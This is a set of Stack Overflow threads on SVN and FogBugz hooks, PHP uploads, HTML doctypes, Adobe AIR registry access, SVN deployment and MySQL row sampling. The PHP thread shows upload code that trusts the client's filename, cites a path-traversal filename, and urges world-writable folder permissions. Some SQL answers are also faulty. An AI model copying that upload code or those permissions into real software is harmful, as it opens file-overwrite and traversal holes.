Q: Integrating Fogbugz with TortoiseSVN with no URL/Subversion backend I've got TotroiseSVN installed and have a majority of my repositories checking in and out from C:\subversion\ and a couple checking in and out from a network share (I forgot about this when I originally posted this question).
This means that I don't have a "subversion" server per-se.
How do I integrate TortoiseSVN and Fogbugz?
Edit: inserted italics
A: Why can't you simply install a subversion server? If you download VisualSVN Server, which is free, you get a http server for your source code and can thus use the FogBugz scripts for integrating the two.
The reason I'm asking is because all scripts and documentation so far assumes you have the server, client-side scripts are too new for FogBugz to have templates for them so you're pretty much left to your own devices on that.
A: I've been investigating this issue and have managed to get it working. There are a couple of minor problems but they can be worked-around.
There are 3 distinct parts to this problem, as follows:
*
*The TortoiseSVN part - getting TortoiseSVN to insert the Bugid and hyperlink in the svn log
*The FogBugz part - getting FogBugz to insert the SVN info and corresponding links
*The WebSVN part - ensuring the links from FogBugz actually work
Instructions for part 1 are in another answer, although it actually does more than required. The stuff about the hooks is actually for part 2, and as is pointed out - it doesn't work "out of the box"
Just to confirm, we are looking at using TortoiseSVN WITHOUT an SVN server (ie. file-based repositories)
I'm accessing the repositories using UNC paths, but it also works for local drives or mapped drives.
All of this works with TortoiseSVN v1.5.3 and SVN Server v1.5.2 (You need to install SVN Server because part 2 needs svnlook.exe which is in the server package. You don't actually configure it to work as an SVN Server) It may even be possible to just copy svnlook.exe from another computer and put it somewhere in your path.
Part 1 - TortoiseSVN
Creating the TortoiseSVN properties is all that is required in order to get the links in the SVN log.
Previous instructions work fine, I'll quote them here for convenience:
Configure the Properties
*
*Right click on the root directory of the checked out project you want to work with.
*Select "TortoiseSVN -> Properties"
*Add five property value pairs by clicking "New..." and inserting the following in "Property Name" and "Property Value" respectively: (make sure you tick "Apply property recursively" for each one)
bugtraq:label BugzID:
bugtraq:message BugzID: %BUGID%
bugtraq:number true
bugtraq:url http://[your fogbugz URL here]/default.asp?%BUGID%
bugtraq:warnifnoissue false
*Click "OK"
As Jeff says, you'll need to do that for each working copy, so follow his instructions for migrating the properties.
That's it. TortoiseSVN will now add a link to the corresponding FogBugz bugID when you commit. If that's all you want, you can stop here.
Part 2 - FogBugz
For this to work we need to set up the hook scripts. Basically the batch file is called after each commit, and this in turn calls the VBS script which does the submission to FogBugz. The VBS script actually works fine in this situation so we don't need to modify it.
The problem is that the batch file is written to work as a server hook, but we need a client hook.
SVN server calls the post-commit hook with these parameters:
<repository-path> <revision>
TortoiseSVN calls the post-commit hook with these parameters:
<affected-files> <depth> <messagefile> <revision> <error> <working-copy-path>
So that's why it doesn't work - the parameters are wrong. We need to amend the batch file so it passes the correct parameters to the VBS script.
You'll notice that TSVN doesn't pass the repository path, which is a problem, but it does work in the following circumstances:
*
*The repository name and working copy name are the same
*You do the commit at the root of the working copy, not a subfolder.
I'm going to see if I can fix this problem and will post back here if I do.
Here's my amended batch file which does work (please excuse the excessive comments...)
You'll need to set the hook and repository directories to match your setup.
rem @echo off
rem SubVersion -> FogBugz post-commit hook file
rem Put this into the Hooks directory in your subversion repository
rem along with the logBugDataSVN.vbs file
rem TSVN calls this with args <PATH> <DEPTH> <MESSAGEFILE> <REVISION> <ERROR> <CWD>
rem The ones we're interested in are <REVISION> and <CWD> which are %4 and %6
rem YOU NEED TO EDIT THE LINE WHICH SETS RepoRoot TO POINT AT THE DIRECTORY
rem THAT CONTAINS YOUR REPOSITORIES AND ALSO YOU MUST SET THE HOOKS DIRECTORY
setlocal
rem debugging
rem echo %1 %2 %3 %4 %5 %6 > c:\temp\test.txt
rem Set Hooks directory location (no trailing slash)
set HooksDir=\\myserver\svn\hooks
rem Set Repo Root location (ie. the directory containing all the repos)
rem (no trailing slash)
set RepoRoot=\\myserver\svn
rem Build full repo location
set Repo=%RepoRoot%\%~n6
rem debugging
rem echo %Repo% >> c:\temp\test.txt
rem Grab the last two digits of the revision number
rem and append them to the log of svn changes
rem to avoid simultaneous commit scenarios causing overwrites
set ChangeFileSuffix=%~4
set LogSvnChangeFile=svn%ChangeFileSuffix:~-2,2%.txt
set LogBugDataScript=logBugDataSVN.vbs
set ScriptCommand=cscript
rem Could remove the need for svnlook on the client since TSVN
rem provides as parameters the info we need to call the script.
rem However, it's in a slightly different format than the script is expecting
rem for parsing, therefore we would have to amend the script too, so I won't bother.
rem @echo on
svnlook changed -r %4 %Repo% > %temp%\%LogSvnChangeFile%
svnlook log -r %4 %Repo% | %ScriptCommand% %HooksDir%\%LogBugDataScript% %4 %temp%\%LogSvnChangeFile% %~n6
del %temp%\%LogSvnChangeFile%
endlocal
I'm going to assume the repositories are at \\myserver\svn\ and working copies are all under `C:\Projects\
*
*Go into your FogBugz account and click Extras -> Configure Source Control Integration
*Download the VBScript file for Subversion (don't bother with the batch file)
*Create a folder to store the hook scripts. I put it in the same folder as my repositories. eg. \\myserver\svn\hooks\
*Rename VBscript to remove the .safe at the end of the filename.
*Save my version of the batch file in your hooks directory, as post-commit-tsvn.bat
*Right click on any directory.
*Select "TortoiseSVN > Settings" (in the right click menu from the last step)
*Select "Hook Scripts"
*Click "Add" and set the properties as follows:
*
*Hook Type: Post-Commit Hook
*Working Copy Path: C:\Projects (or whatever your root directory for all of your projects is.)
*Command Line To Execute: \\myserver\svn\hooks\post-commit-tsvn.bat (this needs to point to wherever you put your hooks directory in step 3)
*Tick "Wait for the script to finish"
*Click OK twice.
Next time you commit and enter a Bugid, it will be submitted to FogBugz. The links won't work but at least the revision info is there and you can manually look up the log in TortoiseSVN.
NOTE: You'll notice that the repository root is hard-coded into the batch file. As a result, if you check out from repositories that don't have the same root (eg. one on local drive and one on network) then you'll need to use 2 batch files and 2 corresponding entries under Hook Scripts in the TSVN settings. The way to do this would be to have 2 separate Working Copy trees - one for each repository root.
Part 3 - WebSVN
Errr, I haven't done this :-)
From reading the WebSVN docs, it seems that WebSVN doesn't actually integrate with the SVN server, it just behaves like any other SVN client but presents a web interface. In theory then it should work fine with a file-based repository. I haven't tried it though.
A: This answer is incomplete and flawed! It only works from TortoisSVN to Fogbugz, but not the other way around. I still need to know how to get it to work backwards from Fogbugz (like it's designed to) so that I can see the Revision number a bug is addressed in from Fogbugz while looking at a bug.
Helpful URLS
http://tortoisesvn.net/docs/release/TortoiseSVN_en/tsvn-dug-propertypage.html
http://tortoisesvn.net/issuetracker_integration
Set the "Hooks"
*
*Go into your fogbugz account and click Extras > Configure Source Control Integration
*Download "post-commit.bat" and the VBScript file for Subversion
*Create a "hooks" directory in a common easily accessed location (preferably with no spaces in the file path)
*Place a copy of the files in the hooks directories
*Rename the files without the ".safe" extension
*Right click on any directory.
*Select "TortoiseSVN > Settings" (in the right click menu from the last step)
*Select "Hook Scripts"
*
*Click "Add"
*Set the properties thus:
*
*Hook Type: Post-Commit Hook
*Working Copy Path: C:\\Projects (or whatever your root directory for all of your projects is. If you have multiple you will need to do this step for each one.)
*Command Line To Execute: C:\\subversion\\hooks\\post-commit.bat (this needs to point to wherever you put your hooks directory from step 3)
*I also selected the checkbox to Wait for the script to finish...
WARNING: Don't forget the double back-slash! "\\"
Click OK...
Note: the screenshot is different, follow the text for the file paths, NOT the screenshot...
At this point it would seem you could click "Issue Tracker Integration" and select Fogbugz. nope. It just returns "There are no issue-tracker providers available".
*
*Click "OK" to close the whole
settings dialogue window
Configure the Properties
*Once again, Right click on the root directory of the checked out
project you want to work with (you need to do this "configure the properties" step for each project -- See "Migrating Properties Between Projects" below)
*Select "TortoiseSVN > Properties" (in the right click menu
from the last step)
*Add five property value pairs by clicking "New..." and inserting the
following in "Property Name" and
"Property Value" respectively:
bugtraq:label BugzID:
bugtraq:message BugzID: %%BUGID%%
bugtraq:number true
bugtraq:url http://[your fogbugz URL
here]/default.asp?%BUGID%
bugtraq:warnifnoissue false
*Click "OK"
Commiting Changes and Viewing the Logs
Now when you are commiting, you can specify one bug that the commit addresses. This kind of forces you to commit after fixing each bug...
When you view the log (Right click root of project, TortoiseSVN > show log) you can see the bug id that each checking corresponds to (1), and you can click the bug id number to be taken to fogbugz to view that bug automatically if you are looking at the actual log message. Pretty nifty!
Migrating Properties Between Projects
*
*Right click on a project that already has the proper Properties configuration
*Select "TortoiseSVN > Properties" (from the right-click menu from step 1)
*Highlight all of the desired properties
*Click "Export"
*Name the file after the property, and place in an easily accessible directory (I placed mine with the hooks files)
*Right click on the root directory of the checked out project needing properties set for.
*Click "Import"
*Select the file you exported in step 4 above
*Click Open
A: The problem is that FogBugz will link to a web page, and file:///etc is not a web page. To get integration two ways, you need a web server for your subversion repository. Either set up Apache or something else that can host those things the proper way.
A: I am not sure I follow you. Do you have the repositories on the network or on your C:\ drive? According to two of your posts, you have both, or neither, or one of them or...
You can not get VisualSVN or Apache to safely serve repositories from a network share. Since you originally said you had the repositories on your C:\ drive, that's what you get advice for. If you have a different setup, you need to tell us about that.
If you have the repositories on your local harddisk, I would install VisualSVN, or integrate it into Apache. VisualSVN can run fine alongside Apache so if you go that route you only have to install it. Your existing repositories can also just be copied into the repository root directory of VisualSVN and you're up and running.
I am unsure why that big post here is labelled as incomplete, as it details the steps necessary to set up a hook script to inform FogBugz about the new revisions linked to the cases, which should be what the incomplete message says it doesn't do. Is that not working?
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3607",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: PHP Error - Uploading a file I'm trying to write some PHP to upload a file to a folder on my webserver. Here's what I have:
<?php
if ( !empty($_FILES['file']['tmp_name']) ) {
move_uploaded_file($_FILES['file']['tmp_name'], './' . $_FILES['file']['name']);
header('Location: http://www.mywebsite.com/dump/');
exit;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Dump Upload</title>
</head>
<body>
<h1>Upload a File</h1>
<form action="upload.php" enctype="multipart/form-data" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1000000000" />
Select the File:<br /><input type="file" name="file" /><br />
<input type="submit" value="Upload" />
</form>
</body>
</html>
I'm getting these errors:
Warning: move_uploaded_file(./test.txt) [function.move-uploaded-file]: failed to open stream: Permission denied in E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php on line 3
Warning: move_uploaded_file() [function.move-uploaded-file]: Unable to move 'C:\WINDOWS\Temp\phpA30E.tmp' to './test.txt' in E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php on line 3
Warning: Cannot modify header information - headers already sent by (output started at E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php:3) in E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php on line 4
PHP version 4.4.7
Running IIS on a Windows box. This particular file/folder has 777 permissions.
Any ideas?
A: As it's Windows, there is no real 777. If you're using chmod, check the Windows-related comments.
Check that the IIS Account can access (read, write, modify) these two folders:
E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\
C:\WINDOWS\Temp\
A: Try adding a path. The following code works for me:
<?php
if ( !empty($_FILES['file']) ) {
$from = $_FILES['file']['tmp_name'];
$to = dirname(__FILE__).'/'.$_FILES['file']['name'];
if( move_uploaded_file($from, $to) ){
echo 'Success';
} else {
echo 'Failure';
}
header('Location: http://www.mywebsite.com/dump/');
exit;
}
?>
A: OMG
move_uploaded_file($_FILES['file']['tmp_name'], './' . $_FILES['file']['name']);
Don't do that. $_FILES['file']['name'] could be ../../../../boot.ini or any number of bad things. You should never trust this name. You should rename the file something else and associate the original name with your random name. At a minimum use basename($_FILES['file']['name']).
A: Warning: move_uploaded_file() [function.move-uploaded-file]: Unable to move 'C:\WINDOWS\Temp\phpA30E.tmp' to './people.xml' in E:\inetpub\vhosts\mywebsite.com\httpdocs\dump\upload.php on line 3
is the important line it says you can't put the file where you want it and this normally means a permissions problem
check the process running the app (normally the webservers process for php) has the rights to write a file there.
EDIT:
hang on a bit
I jumped the gun a little is the path to the file in the first line correct?
A: Another think to observe is your directory separator, you are using / in a Windows box..
A: Add the IIS user in the 'dump' folders security persmissions group, and give it read/write access.
A: Create a folder named "image" with folder permission 777
<?php
move_uploaded_file($_FILES['file']['tmp_name'],"image/".$_FILES['file']['name']);
?>
A: We found using below path
{['DOCUMENT_ROOT'] + 'path to folder'
and giving everyone full access to the folder resolved the issue.
Make sure to not reveal the location in the address bar. No sense in giving the location away.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3611",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: Using SQLite with Visual Studio 2008 and Silverlight Any one know decent way to reference a SQLite database using the above mentioned tools? I tried using ODBC (the SQLite driver) but while the connection is good, I get no data returned. Like I can't see any tables in Data Connection (VS 2008). Is there a better way?
Edit: corrected typos
A: Joel Lucsy: That implementation of SQLite is a mixed-mode assembly which is not supported by Silverlight. Only a pure managed implementation would work under the Silverlight CLR.
A: Have you tried the ADO driver for SQLite?
There is a great quick start guide (thanks to another thread here) that you can get here:
http://web.archive.org/web/20100208133236/http://www.mikeduncan.com/sqlite-on-dotnet-in-3-mins/
A: The MIT licensed C#-SQLite might be the right solution. It's a complete managed port of SQLite, so it can be used with Silverlight.
A: You should give Siaqodb a try. I haven't tested it but they mention that is works with Silverlight OOB apps and even give you a tutorial here.
It's commercial software, but a 30 day trial is available.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3615",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: What's the Developer Express equivalent of System.Windows.Forms.LinkButton? I can't seem to find Developer Express' version of the LinkButton. (The Windows Forms linkbutton, not the ASP.NET linkbutton.) HyperLinkEdit doesn't seem to be what I'm looking for since it looks like a TextEdit/TextBox.
Anyone know what their version of it is? I'm using the latest DevX controls: 8.2.1.
A: The control is called the HyperLinkEdit. You have to adjust the properties to get it to behave like the System.Windows.Forms control like so:
control.BorderStyle = BorderStyles.NoBorder;
control.Properties.Appearance.BackColor = Color.Transparent;
control.Properties.AppearanceFocused.BackColor = Color.Transparent;
control.Properties.ReadOnly = true;
A: You should probably just use the standard ASP.Net LinkButton, unless it's really missing something you need.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3625",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: HTML version choice When developing a new web based application which version of html should you aim for?
EDIT:
cool I was just attempting to get a feel from others I tend to use XHTML 1.0 Strict in my own work and Transitional when others are involved in the content creation.
I marked the first XHTML 1.0 Transitional post as the 'correct answer' but believe strongly that all the answers given at that point where equally valid.
A: I'd shoot for XHTML Transitional 1.0. There are still a few nuances out there that don't like XHTML strict, and most editors I've seen now will give you the proper nudges to make sure that things are done right.
A: Transitional flavors of XHTML and HTML are deprecated. They were intended only for old user-agents that don't support CSS. See explanation in the DTD.
W3C advises that you should use Strict whenever possible, and these days it's certainly possible.
Transitional version has already been removed in XHTML/1.1 and HTML5.
XHTML/1.0 has exactly the same elements and attributes (semantics) as HTML4. The XHTML/1.0 specification doesn't even specify any elements! For anything else than syntax, it refers to HTML4.
Additionally, you'll be unable to use any feature of XHTML that is not available in HTML (namespaces, XML DOM) if you send documents as text/html, and unfrortunately that is required for compatibility with IE and other HTML-only browsers.
In 2008 the correct choice would be HTML4 Strict:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
but as of 2016, there's only one version of HTML that matters.
<!DOCTYPE html>
A: Dillie-O is right on with his answer of XHTML 1.0 Transitional but I would suggest shooting for XHTML 1.0 Strict and only falling back on Transitional if there's some piece of functionality you absolutely need that Strict is not allowing.
A: @Mike:
While I agree that validity is not needed to make a page render (after all, we have to keep IE6 compatibility in...), creating valid XHTML that IS compatible AND valid is not a problem. The problems start when people are used to HTML 4 and using the depreciated tags and attributes.
Just because the Web is a pile of crap does not mean that every new page needs to be a pile of crap as well. Most Validation errors on SO are so trivial, it shouldn't take too long to fix, like missing quotes on attributes.
But it may still be kind of pointless, given the fact that the W3C does not have any idea where they want to be going anyway (see HTML 5) and a certain big Browser company that also makes operating systems does not care as well, so a site could as well send out it's doctype as HTML 1337 Sucks and browsers will still try to render it.
A: There are some compelling warnings about the usage of XHTML, primarily centering around the fact that the mime-type for such a document should be sent as:
Content-type: application/xhtml+xml
Yet IE 6 and 7 don't support this, and then websites must send it as:
Content-type: text/html
Unfortunately that method is considered harmful.
Some also bemoan the fact that although the intent of XHTML is to make web pages parsable by an XML parser, it has in practice failed due to incorrect usage on existing websites.
I still prefer to write documents in XHTML 1.0 Strict, mostly because of the challenge, and the cleanliness and error-checking that a validator gives. I enjoy the syntax a bit better, because it forces me to be very explicit in when tags end, etc. It's more for me a personal choice than purely technical.
A: HTML 4.01. There is absolutely no reason to use XHTML for anything but experimental or academic problems that you only want to run on the 'obscure' web browsers.
XHTML Transitional is completely pointless even to those browsers, so I'm not sure why anyone would aim for that. It's actually pretty alarming that a number of people would recommend that.
I'd say aiming for HTML 4.01 is the most predictable, but Teifion is right really, "anything that renders your page will do".
in response to Michael Stum:
XHTML is XML based, so it allows easier parsing and you can also use the XML Components of most IDEs to programatically query and insert stuff.
This is certainly not true. A lot of XHTML on the web (if not most) does not conform to XML validity (and it needn't - it's not being sent as XML). Trying to treat this like XML when dealing with it is just going to earn you a lot of headaches. This page on Stack Overflow, for instance, will generate errors with many unforgiving XML tools for having invalid mark-up.
A: Anything that renders your page is will do so regardless of which popular standard you use. XHTML is stricter and probably "better" but I can't see what advantages you will get with one standard over another.
A: Personally, I prefer XHTML 1.0 Transitional.
XHTML is XML based, so it allows easier parsing and you can also use the XML Components of most IDEs to programatically query and insert stuff.
Transitional is not as strict as strict, which makes it relatively easy to work with, compared to strict which can often be a PITA. Comparison between Transistional and Strict
1.0 is "more compatible" than 1.1 and 1.1 seems to be still under some sort of development.
A: I aim for XHTML 1.0 Trans. It's better to conform so when bugs are fixed in the browsers you won't suddenly be working against the clock trying to figure out what actually needs changing.
In my opinion 1.1 is borked and 2.0 has been smashed to smithereens: Do I really need/want a header/footer tag?
A: I'm all for XHTML Strict every time. I strongly believe that HTML should be more like XML. It's not hard to validate it if you know XML and the W3's validator ipoints you on the right track anyway.
XHTML 2.0 is heading toward what the W3 have been aiming for for a long time - the semantic web. The best benefit of XHTML 2.0 for me is that every conformant page on the web will be understandable as content, or an article (for that's what pages are - documents) becuase they all apply to the same standard. You would then be able to construct intepreters (i.e. browsers) that present the content in a completely different manner - there's literally thousands of ideas waiting here.
A: If you want to use XHTML 1.0 in an HTML-compatible way, that's fine. However, do note that the W3C validator and the XHTML DTDs know nothing about mime types and how browsers behave differently (like <map> name/id matching) between them. The DTDs know nothing about how well browsers support certain elements (like <embed> for example) either.
What this means is that the XHTML DTDs and the validator don't reflect reality and trying to conform to them is pointless.
If you want to use XHTML just so you can close certain elements with /> (where html-compatible), just use HTML5 markup (so the browser is in full standards mode). HTML5 allows the use of /> in an HTML-compatible way (the same HTML-compatible way you have to do it when using XHTML 1.0 markup with text/html). Then, just stick to what works (you know better than some DTD) in browsers.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8"/>
<title></title>
</head>
<body>
<p>Line1<br/>Line2</p>
<p><img src="" alt="blank"/></p>
<p><input type="text"/></p>
<p><embed type="application/x-something" src=""/></p>
</body>
</html>
Then, use http://validator.nu/ to make sure it's well formed at least.
A: If you have tools to generate your XHTML like any other XML document, then go with XHTML. But when you just use plain text templates, text concatenation, etc. you are OK with good old HTML 4.01.
Browsers now start to support this 10 year old standard.
Important: Avoid being called a bozo when producing XML
A: I don't think it actually matters whether you use XHTML or plain HTML. The end goal here is to have low maintenance and quick development through a predictable rendering. You can get this from using xhtml or html, as long as you have validating code. I've even heard arguments that it's best to target quirks mode, because new versions of browsers don't change quirks mode, so maintenance is easy.
In the end, it all becomes tag soup, for good reason, because getting web app developers to write error-free html means asking them to write bug-free code. Validators are no help, because they only validate the initial page view. This is also why I've never seen the point in xhtml served as xml for anything beyond static sites. The level of arrogance a web apps developer would need to have to serve up their web app as xml is staggering.
A: HTML 4.0 Strict, or ISO HTML.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3654",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Can you access the windows registry from Adobe Air? (y/N)
Edit: Read-only access is fine.
A: I haven't tried this yet, but I think I've found a workaround.
Adobe AIR cannot write to Windows Registry, but you can, however, launch a native process in AIR 2. Here's a blog post that shows how to do that: http://www.adobe.com/devnet/air/flex/quickstart/articles/interacting_with_native_process.html
Now, on Windows, you are able to modify the Windows registry with .reg files. .reg files are just plain text files that's read by regedit.exe. So in theory, you can write a .reg file to the file system, then launch regedit.exe with the .reg file passed in and...TADA! You just modified Windows registry from your AIR app!
To read value, you can use regedit's export function to write to a reg file and read from the reg file. Details to regedit's options: http://www.robvanderwoude.com/regedit.php
Here are some additional resources:
.reg file syntax: http://support.microsoft.com/kb/310516
write to file with AIR: http://www.adobe.com/devnet/air/flex/articles/exploring_file_capabilities.html
A: If your willing to force the user to also install another application, you could write a small C# or C++ windows service that simply opens a Socket that provides some kind of protocol for accessing the registry. Then in AIR you can use the Socket class to send messages to/from the C# service that would return results to the AIR app.
When the app loads you can try to connect to the Socket, and if the connection is rejected you could prompt the user to download/install the service.
As for direct access to the registry I am pretty sure Adobe wouldn't allow that from AIR.
A:
If you can I'd be horrified.
Why would you be horrified?
Air is a desktop platform, and having access to the OS's APIs (such as registry access) makes plenty of sense.
That being said, it isn't supported now (and as Adobe seem to be very Mac-centric, I doubt it will ever be added).
I have settled on grabbing the users name from the name of the user directory
Using File.userDirectory.name will work in most cases, but it seems like a very fragile implementation, it relies on the OS maintaining the convention of having the username as their directory. I can think of a few possible things that might break it (playing with TweakUI etc).
A: Here is a sample of modifying Windows Registry in Adobe Air using NativeProcess and Python. So you can Add, Delete or Read keys by only a single line of code !!
Download: Adobe Air Registry Modifier on Github
A: Are you trying to determine if the user is an administrator or not?
If so you could grad the username by with "File.userDirectory.name".
And I think to figure out if the user is an administrator you could probably try to access a file that requires administrator privileges (maybe try writing a file to Windows/System32). If the file access fails you could probably assume that the user is under a Limited account.
A: A bit late, but I got a wish from a client to read some values from the registry when the project was almost finished. If there were more of these types of wishes, I would have never choosen AIR. But I found a nice extension from FluorineFx, and by extending it, I can now read string and dword values from the registry. Windows only: http://aperture.fluorinefx.com/
A: You could theoretically modify the actual registry files, but I would highly discourage that idea.
A: Be very careful if you decide to create a socket server that listens for registry commands. You are potentially creating a security hole and users' personal firewalls may get in the way in terms of usability.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3666",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: What is your favorite web app deployment workflow with SVN? We are currently using a somewhat complicated deployment setup that involves a remote SVN server, 3 SVN branches for DEV, STAGE, and PROD, promoting code between them through patches, etc. I wonder what do you use for deployment in a small dev team situation?
A: When i worked in a small dev team (small meaning me, another programmer and the boss), it was quite the chaotic mess. However we found that Assigning a "gatekeeper" type of process worked for us.
The gatekeeper was the person who had done the most work on the app (in this case, i had 2 projects i developed from the ground up, he had like 4).
Basically, whenever he had to work on my projects, he'd notify me that he was doing work, i'd make sure the repository was up-to-date and buildable, then he would pull down, make his changes, then commit. He would inform me that it was done, i would pull down, build and deploy. If there were DB changes we had a DB Change folder with all the scripts that would correct the DB.
It's obviously got a lot of holes in it, but the process worked for us, and kept us from building over each other.
A: Three branches just sounds like extra work.
Environmental differences can be handled by having different versions of the relevant files in the trunk. i.e. database.yml & database.yml.prod. The deployment process should be environmentally aware and simply copy the per-environment files over the default ones.
A: I haven't had any trouble with the common tags/branches/trunk organization.
General ongoing development happens in trunk.
Maintenance of a release in production happens in the appropriate release branch.
Changes to release branch which are still relevant to trunk are merged.
When a new version is ready for deployment it is tagged from trunk, then a branch is created from that tag. The new release branch is checked out to the server, parallel to the current release. When it's time to switch, the paths are juggled ("mv appdir appdir.old && mv appdir.new appdir").
Developers supporting the production release then svn switch their working copy to the new branch, or do a fresh checkout from it.
A: A simple trunk branch contains the most current code, then cut a branch whenever we go live. This seems to work pretty effectively. You can easily go to the previous branch whenever the current branch that you cut for the live system fails. Also, it is easy to fix bugs on the branch that is currently live, and since the branch effectively dies when you cut a new one, there is only ever 1 real branch you need to work on (and then merge fixes from there to the live branch).
A: trunk for development, and a branch (production) for the production stuff.
On my local machine, I have a VirtualHost that points to the trunk branch, to test my changes.
Any commit to trunk triggers a commit hook that does an svn export and sync to the online server's dev URL - so if the site is stackoverflow.com then this hook automatically updates dev.stackoverflow.com
Then I use svnmerge to merge selected patches from trunk to production in my local checkouts. I have a VirtualHost again on my local machine pointing to the production branch.
When I commit the merged changes to the production branch, again an SVN export hook updates the production (live) export and the site is live!
A: We don't use branches for staging web-related stuff; only for testing experimental things that will take a long time (read: more than a day) to merge back into trunk. The trunk, in 'continuous integration' style, represents a (hopefully) working, current state.
Thus, most changes get committed straight to trunk. A CruiseControl.NET server will automatically update on a machine that also runs IIS and has up-to-date copies of all the extra site's resources available, so the site can be fully, cleanly tested in-house. After testing, the files are uploaded to the public server.
I wouldn't say it's the perfect approach, but it's simple (and thus suitable for our relatively small staff) and relatively safe, and works just fine.
A: Trunk contains the current "primary" development codebase.
A developer will often create an individual branch for any medium to long-term project that could hose the trunk codebase and get in the way of the other devs. When he's complete he'll merge back into trunk.
We create a tagged-release every time we push code to production. The folder in /tags is simply the version number.
To deploy to production we're doing an SVN Export to Staging. When that's satisfactory we use a simple rsync to roll out to the production clusters.
A: I highly recommend the book (currently in rough cuts) Continuous Delivery, which describes a full process for managing software delivery, based on continuous integration principles (among others).
I strongly dislike the branch and merge approach, as it can get very messy, and is pretty wasteful since you end up spending time on activities which don't actually deliver any new value. You've already developed, tested, and fixed your code once, why create a situation (copying the code to another branch) which requires you to redo this work?
Anyway, the way to avoid branching and merging is to build your deployable artefacts from trunk, and promote the built artefacts (rather than source) as it passes test, staging, etc. This way you are 100% sure that the thing you're putting into production is the same thing you've tested.
If you've got different features which may need to be released on different schedules, changing your approach to how you implement (make functionality configurable, or better yet modular) can help you keep a single development trunk.
A: We use release branching - this seems to be more efficient for us than the feature branching we were doing.
Don't make different branches for the different environments.
A: I personally work locally (development), adding/fixing features and when I think it's ready I commit to trunk (production). On production server I just do an svn update.
A: I work with a similar situation to that which you currently have. I was tasked with finding a ‘better’ solution and it ran something along the lines of the following.
The live branch represents the servers in their current state.
Any development work should be done in a branch that is taken from live. This could be a one person half hour job or a year long multi team project. As often as is liked changes to live can be merged into these development branches.
Before a piece of work goes live, changes from live are merged again and it is tagged as a potential release. This release is tested on the staging environment and if it passes testing the new live is taken from the tag.
It is possible to merge several pieces of work into one release if that works better.
This means that it is fairly simple to keep development branches up to date with live and if a piece of work in development is dropped there is minimal tidying up to do.
To change from working on one project to another a developer can simply svn switch their local working environment to a different branch.
One of the problems we have had with the system as you describe is that DEV can get out of date with PROD fairly quickly, so you are not developing against the live and it is not easy to spot cross dependencies until stage. The above solution solves these issues while still remaining fairly lightweight.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3667",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "15"
} |
Q: Distribution of table in time I have a MySQL table with approximately 3000 rows per user. One of the columns is a datetime field, which is mutable, so the rows aren't in chronological order.
I'd like to visualize the time distribution in a chart, so I need a number of individual datapoints. 20 datapoints would be enough.
I could do this:
select timefield from entries where uid = ? order by timefield;
and look at every 150th row.
Or I could do 20 separate queries and use limit 1 and offset.
But there must be a more efficient solution...
A: Michal Sznajder almost had it, but you can't use column aliases in a WHERE clause in SQL. So you have to wrap it as a derived table. I tried this and it returns 20 rows:
SELECT * FROM (
SELECT @rownum:=@rownum+1 AS rownum, e.*
FROM (SELECT @rownum := 0) r, entries e) AS e2
WHERE uid = ? AND rownum % 150 = 0;
A: Something like this came to my mind
select @rownum:=@rownum+1 rownum, entries.*
from (select @rownum:=0) r, entries
where uid = ? and rownum % 150 = 0
I don't have MySQL at my hand but maybe this will help ...
A: As far as visualization, I know this is not the periodic sampling you are talking about, but I would look at all the rows for a user and choose an interval bucket, SUM within the buckets and show on a bar graph or similar. This would show a real "distribution", since many occurrences within a time frame may be significant.
SELECT DATEADD(day, DATEDIFF(day, 0, timefield), 0) AS bucket -- choose an appropriate granularity (days used here)
,COUNT(*)
FROM entries
WHERE uid = ?
GROUP BY DATEADD(day, DATEDIFF(day, 0, timefield), 0)
ORDER BY DATEADD(day, DATEDIFF(day, 0, timefield), 0)
Or if you don't like the way you have to repeat yourself - or if you are playing with different buckets and want to analyze across many users in 3-D (measure in Z against x, y uid, bucket):
SELECT uid
,bucket
,COUNT(*) AS measure
FROM (
SELECT uid
,DATEADD(day, DATEDIFF(day, 0, timefield), 0) AS bucket
FROM entries
) AS buckets
GROUP BY uid
,bucket
ORDER BY uid
,bucket
If I wanted to plot in 3-D, I would probably determine a way to order users according to some meaningful overall metric for the user.
A: @Michal
For whatever reason, your example only works when the where @recnum uses a less than operator. I think when the where filters out a row, the rownum doesn't get incremented, and it can't match anything else.
If the original table has an auto incremented id column, and rows were inserted in chronological order, then this should work:
select timefield from entries
where uid = ? and id % 150 = 0 order by timefield;
Of course that doesn't work if there is no correlation between the id and the timefield, unless you don't actually care about getting evenly spaced timefields, just 20 random ones.
A: Do you really care about the individual data points? Or will using the statistical aggregate functions on the day number instead suffice to tell you what you wish to know?
*
*AVG
*STDDEV_POP
*VARIANCE
*TO_DAYS
A: select timefield
from entries
where rand() = .01 --will return 1% of rows adjust as needed.
Not a mysql expert so I'm not sure how rand() operates in this environment.
A: For my reference - and for those using postgres - Postgres 9.4 will have ordered set aggregates that should solve this problem:
SELECT percentile_disc(0.95)
